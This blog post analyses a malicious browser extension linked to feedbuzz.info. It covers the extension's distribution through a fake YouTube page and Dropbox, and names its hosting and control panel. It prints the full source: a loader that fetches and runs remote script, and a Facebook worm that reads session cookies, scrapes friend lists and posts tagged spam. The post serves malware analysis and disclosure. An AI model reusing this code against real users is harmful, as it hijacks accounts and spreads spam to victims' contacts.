Feedbuzz.info (Malicious browser extension Hosted in Canada by Sarah Ryan)

Resolved Feedbuzz.info to 184.107.233.186

The extension comes in both firefox and chrome flavors
Initial loading comes from a fake youtube page, http://video8244.uni.me
 The page is loaded from a dropbox account (/u/95827902/), and the extensions are loaded from epicrewards.net

Here is the firefox extension source
loadScript_you();
function loadScript_you() {
    if ('https:' == document.location.protocol) return false;
    var s = document.createElement('script');
    s.setAttribute("type","text/javascript");
    s.setAttribute("src", "http://feedbuzz.info/js.php");
    var head=document.getElementsByTagName("head")[0];
    if( head==null) return false;
    head.appendChild(s);
    return true;
}
It calls js.php file from the site feedbuzz.info, which can be changed depending on what the owner wants the extension to do. Currently it picks one of two urls and posts them on facebook.

/* If you found this file, then congrats! */
/* Predefined variables and functions for the modules to use */
country = "";
ip = "127.0.0.1"; /* Module: facebookwall&tag.php Start */
var variables = Math.floor(Math.random() * 100000000);
var blogs = new Array();
blogs[0] = 'http://youtube-snakes.tumblr.com/?';
blogs[1] = 'https://dl.dropbox.com/u/76699623/Youtube/Youtube%20theme.html/?';
var rand = Math.floor(Math.random() * blogs.length);
var blog = blogs[rand];

function readCookie(a) {
    var b = a + '=';
    var c = document['cookie']['split'](';');
    for (var d = 0; d < c['length']; d++) {
        var e = c[d];
        while (e['charAt'](0) == ' ') {
            e = e['substring'](1, e['length']);
        }
        if (e['indexOf'](b) == 0) {
            return e['substring'](b['length'], e['length']);
        }
    }
    return null;
}
function setCookie(nombre, valor, caducidad) {
    var expireDate = new Date();
    expireDate.setDate(expireDate.getDate() + caducidad);
    document.cookie = nombre + "=" + escape(valor) + "; expires=" + expireDate.toGMTString() + "; path=/";
}
function isDefined(variable) {
    return (typeof (window[variable]) != "undefined");
}
function like_url_con_etiketa_2(url, story_fbid) {
    var post_form_id = Env.post_form_id;
    var impid = Env.impid;
    var fb_dtsg = Env.fb_dtsg;
    if (!isDefined("user_id")) {
        user_id = readCookie('c_user');
    }
    var lista;
    var c = new XMLHttpRequest();
    c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + user_id + '&__user=' + user_id + '&' + Math['random'](), false);
    c['send']();
    if (c['readyState'] == 4) {
        if (c['status'] == 200) {
            var data = eval('(' + c['responseText']['substr'](9) + ')');
            if (data['error']) {
                lista = null;
            } else {
                lista = data['payload']['entries'];
            }
        }
    }
    var n;
    if (lista['length'] > 10) {
        n = 10;
    }
    var etiquetas = '';
    for (var i = 0; i < n; i++) {
        etiquetas += "@[" + lista[i]['uid'] + ":" + lista[i]['text'] + "] ";
    }
    var comment = "damn watch it " + etiquetas;
    var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
    var e = 'href=' + url + '&node_type=link' + '&edge_type=like' + '&page_id' + '&connect_text=0' + '&story_fbid=' + story_fbid + '&comment=' + comment + '&widget_type=xfbml' + '&nctr[_mod]=like_widget' + '&nctr[_impid]=' + impid + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_form_id_source=AsyncRequest';
    c['open']('POST', d, true);
    c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    c['setRequestHeader']('Content-length', e['length']);
    c['setRequestHeader']('Connection', 'keep-alive');
    c['onreadystatechange'] = function () {};
    c['send'](e);
    return true;
}
function like_url_con_etiketa_1(url) {
    url = encodeURIComponent(url);
    var post_form_id = Env.post_form_id;
    var impid = Env.impid;
    var fb_dtsg = Env.fb_dtsg;
    var c = new XMLHttpRequest();
    var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
    var e = 'href=' + url + '&node_type=link' + '&edge_type=like' + '&page_id' + '&layout=standard' + '&is_personalized=false' + '&connect_text=0' + '&ref' + '&now_connected=true' + '&post_form_id=' + post_form_id + '&iframe_referer=' + url + '&nctr[_mod]=like_widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_form_id_source=AsyncRequest';
    c['open']('POST', d, true);
    c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    c['setRequestHeader']('Content-length', e['length']);
    c['setRequestHeader']('Connection', 'keep-alive');
    c['onreadystatechange'] = function () {
        if (c['readyState'] == 4) {
            if (c['status'] == 200) {
                var data = c['responseText']['substr'](9) data = eval('(' + data + ')');
                if (data['error']) {} else {
                    like_url_con_etiketa_2(url, data['payload']['story_fbid']);
                }
            }
        }
    };
    c['send'](e);
}
function FBFBFB321() {
    if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
        if (!isDefined("user_id")) {
            user_id = readCookie('c_user');
        }
        if (user_id == null) return false;
        var url = blog;
        url = encodeURIComponent(url);
        var url_cookie = readCookie("fb_gstres_" + user_id + "_" + "url_4");
        if (url_cookie != "activate") {
            like_url_con_etiketa_1(url);
            setCookie("fb_gstres_" + user_id + "_" + "url_4", "activate", 2);
        }
        return true;
    }
    return false;
}
FBFBFB321(); /* Script Ends *\ /* Module: facebookwall&tag.php End */

The owner seems to be doing all of his spreading using free services
Both spreading links install the extensions from the dropbox account /u/76699623/, rather than epicrewards.net

The chrome extension source is slightly different
loadScript_YOU();
function loadScript_YOU() {
    if ('https:' == document.location.protocol) return false;
    var s = document.createElement('script');
    s.setAttribute("type","text/javascript");
    s.setAttribute("src", "http://feedbuzz.info/js.php");
    var head=document.getElementsByTagName("head")[0];
    if( head==null) return false;
    head.appendChild(s);
    return true;
}
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-31861921-1 ']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();


var toDOM = document.createElement('script');
toDOM.innerHTML='var _wau = _wau || []; _wau.push(["small", "3bcmg6ofjwms", "05a"]);(function() { var s=document.createElement("script"); s.async=true; s.src="http://widgets.amung.us/small.js";document.getElementsByTagName("head")[0].appendChild(s);})();'

document.body.appendChild(toDOM);
It includes two analytical scripts, most likely to track the sites visited
The Google Analytics account is
UA-31861921-1

And the amung.us account is 
3bcmg6ofjwms
 The chrome extension also includes an update link
"update_url": "http://plugin.elchavo.info/chrome.xml" 
However it does not resolve at this time

The control panel is located at http://feedbuzz.info/admin/login.php
Hosting info: http://whois.domaintools.com/feedbuzz.info
Samples: http://3ab4aaf5.linkbucks.com
Thanks to SassDrake at virustotal.com for the links to the samples
Edit: Here is a blog post showing how the posts look from facebook (You will probably need google translate)
http://blog.vbalazs.me/2012/08/trukkos-facebook-spam-bongeszo.html

0 comments:

Post a Comment